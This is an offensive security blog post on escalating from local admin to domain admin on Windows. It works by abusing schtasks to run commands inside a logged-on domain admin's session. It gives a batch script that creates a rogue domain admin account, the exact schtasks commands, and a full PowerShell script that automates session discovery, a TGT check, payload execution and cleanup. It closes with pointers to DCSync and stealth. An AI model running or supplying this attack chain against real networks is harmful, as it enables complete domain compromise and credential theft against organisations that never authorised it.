Ghost In The Flame

Bu4$t Py40's blog!

From Local Admin to Domain admin | Schtasks ftw


Schtasks overview:

By default any user can create scheduled tasks that run as themselves with Windows' built-in Task Scheduler. That is handy enough for persistence, but what if we are a local administrator?

Local administrators can create tasks that run as any account the machine knows about. That covers every local account, including the built-in Administrator, and SYSTEM itself (/ru SYSTEM). Note that /rl HIGHEST only asks for the account's elevated (non-UAC-filtered) token; it does not change which account the task runs as.

While this is nice and can provide some fun silly ways to get system, there's another more damaging thing we can do with this.

schtasks.exe has a /ru flag ("run as user") that sets the account the task runs as. That account can be a domain user!

A task that runs as a domain user can only do domain things if the task actually ends up with that user's network credentials. There is one circumstance you can count on: the user is already logged on to the machine, so LSASS holds their logon session and Kerberos TGT, and a task bound to that session ("run only when user is logged on", schtasks /it) inherits them. Without that, schtasks either needs the account's password (/rp), or with /np creates a logon that stores no password and can only reach local resources, so anything that talks to a DC fails. There is a second path that depends on a specific Hyper-V setting, but it is not enabled by default, so don't count on it.

So the practical check is whether a domain account is currently logged on to the computer. If one is, a task bound to that session can run commands against the domain as that user.

Exploitation

If you happen to get local admin on a machine that a domain administrator is logged into then you can use this trick to run commands as a domain admin!

First, check which users are logged on to the machine, either remotely with netexec's --loggedon-users option (nxc smb <target> -u <user> -p <pass> --loggedon-users) or locally with the built-in query command (quser is the same thing):

query user

This lists the sessions on the box with their usernames and state (Active or Disc). If a DA is among them, you're golden!

I like to use a batch script to add a new DA to the domain in order to exploit this. Everything is written to a log file because the task runs inside someone else's session and you never see its console.

An example is:

@echo off
REM Log file; C:\temp must exist or every redirect below fails silently.
if not exist C:\temp mkdir C:\temp
set LOG=C:\temp\bat_logs.txt
echo %date% %time% >> %LOG%
echo "triggered" >> %LOG%
REM The password has to satisfy the domain password policy or /add fails.
net user hacker_da "Str0ng-Passw0rd!2024" /add /domain >> %LOG% 2>&1 && echo "account created" >> %LOG% || echo "error making user" >> %LOG%
net group "domain admins" hacker_da /add /domain /Y >> %LOG% 2>&1 && echo "hacker added to domain admin group" >> %LOG% || echo "error adding user to group" >> %LOG%
echo "finished" >> %LOG%

Then add the task. /ru is the logged-on domain user, /rl HIGHEST requests their elevated token, and /it binds the task to their interactive session ("run only when user is logged on"), which is the mode that reuses their existing logon session and tickets. The ONIDLE trigger doesn't matter much since we kick the task off by hand right after:

schtasks /create /sc ONIDLE /i 10 /tn Privesc /tr "C:\path\to\bat\file.bat" /ru domain\user_you_want_to_run_the_bat_as /rl HIGHEST /it

Once the task is added, run it (note that /run takes the task name with /tn, there is no /rn switch):

schtasks /run /tn Privesc

Now you have a DA whose password you know, and you can DCSync! Check C:\temp\bat_logs.txt first to make sure both net commands reported success, then clean up: schtasks /delete /tn Privesc /f and remove the log file, which names the account you just created. Bear in mind that creating a new Domain Admin is about as loud as it gets; if stealth matters, have the script do something quieter with the DA's token instead.
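As an added example (not code from the original post), here is the whole procedure in PowerShell, covering both the logged-on-session check from the overview and the exploitation steps above: confirm the target user has a session, run a throwaway probe task in that session to check it really holds a Kerberos TGT before spending it, then fire the payload task and delete it. Everything specific is an assumption: CORP\da.user as the logged-on DA, C:\temp\file.bat as the batch script above, and C:\temp (a path without spaces) as the log directory. It shells out to schtasks.exe rather than the ScheduledTasks cmdlets so the flags match the post, and adds /it so the task is bound to the user's interactive session. Run it from an elevated prompt; if your build still prompts for a run-as password on /create, run it interactively rather than over a dumb shell.

```powershell
<#
Added example, not the post's own code. Probes a logged-on domain user's
session for a TGT, then runs the payload as that user via schtasks and
cleans the task up. Needs an elevated (local admin) PowerShell session.
All names and paths below are hypothetical placeholders.
#>
param(
    [string]$RunAs   = 'CORP\da.user',      # assumption: the logged-on DA account
    [string]$Payload = 'C:\temp\file.bat',  # assumption: path of the batch script above
    [string]$LogDir  = 'C:\temp'            # assumption: exists, no spaces, writable by the user
)

function Get-LoggedOnUsers {
    # Parse "query user" (the post's check) into objects. Columns are
    # USERNAME SESSIONNAME ID STATE IDLE LOGON TIME; SESSIONNAME is blank
    # for disconnected sessions and the caller's own row starts with ">".
    $rx = '^\s*>?(?<user>\S+)\s+(?:(?<session>\S+)\s+)?(?<id>\d+)\s+(?<state>\S+)\s+(?<idle>\S+)\s+(?<logon>.+)$'
    query user 2>$null | Select-Object -Skip 1 | ForEach-Object {
        if ($_ -match $rx) {
            [pscustomobject]@{ User = $Matches.user; Session = $Matches.session; Id = [int]$Matches.id; State = $Matches.state }
        }
    }
}

function Invoke-TaskAsUser {
    param([string]$TaskName, [string]$Command, [string]$User, [int]$TimeoutSec = 60)
    # Create, fire, wait for and delete a task that runs $Command as $User.
    # /it = "run only when user is logged on": the task reuses the user's
    # existing logon session (and tickets) instead of needing /rp or a
    # credential-less /np logon that cannot reach the DC.
    schtasks /create /f /sc ONIDLE /i 10 /tn $TaskName /tr $Command /ru $User /rl HIGHEST /it | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "schtasks /create failed for $User (logged on? elevated?)" }
    try {
        schtasks /run /tn $TaskName | Out-Null
        $deadline = (Get-Date).AddSeconds($TimeoutSec)
        do {
            Start-Sleep -Seconds 2
            $status = (schtasks /query /tn $TaskName /fo LIST | Select-String '^Status:').Line
        } while ($status -match 'Running' -and (Get-Date) -lt $deadline)
    } finally {
        schtasks /delete /tn $TaskName /f | Out-Null   # leave no task behind
    }
}

function Test-DomainContext {
    param([string]$User)
    # Probe: run whoami + klist inside the session and read the file back.
    # A "krbtgt/" line means the session holds a TGT, so DC-bound commands
    # (net user /domain, and a DCSync later) will authenticate as this user.
    $out = Join-Path $LogDir 'probe.txt'
    Remove-Item $out -ErrorAction SilentlyContinue
    $cmd = "cmd.exe /c whoami /upn > $out 2>&1 & klist >> $out 2>&1"
    Invoke-TaskAsUser -TaskName 'ProbeSession' -Command $cmd -User $User
    if (-not (Test-Path $out)) { return $false }   # task never ran in that session
    $text = Get-Content $out -Raw
    Write-Host $text
    Remove-Item $out -ErrorAction SilentlyContinue
    return [bool]($text -match 'krbtgt/')
}

# 1. Is the target actually logged on here?
$sam = ($RunAs -split '\\')[-1]
$session = Get-LoggedOnUsers | Where-Object { $_.User -ieq $sam }
if (-not $session) {
    Write-Warning "$RunAs has no session on this host; a task as that user would have no domain credentials."
    return
}
Write-Host "$RunAs is logged on (session state: $($session.State -join ','))"

# 2. Does that session hold a TGT? Don't burn the trick on a session that cannot reach the DC.
if (-not (Test-DomainContext -User $RunAs)) {
    Write-Warning "No TGT visible in the $RunAs session; not running the payload."
    return
}

# 3. Run the batch script from the post as that user, then show its log.
Invoke-TaskAsUser -TaskName 'Privesc' -Command $Payload -User $RunAs
Get-Content (Join-Path $LogDir 'bat_logs.txt')
```

The probe step is the part worth keeping even if you drop the rest: it costs one extra task and tells you, before you touch the domain, whether the session you found with query user is the kind that can talk to the DC or just a stale local logon.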
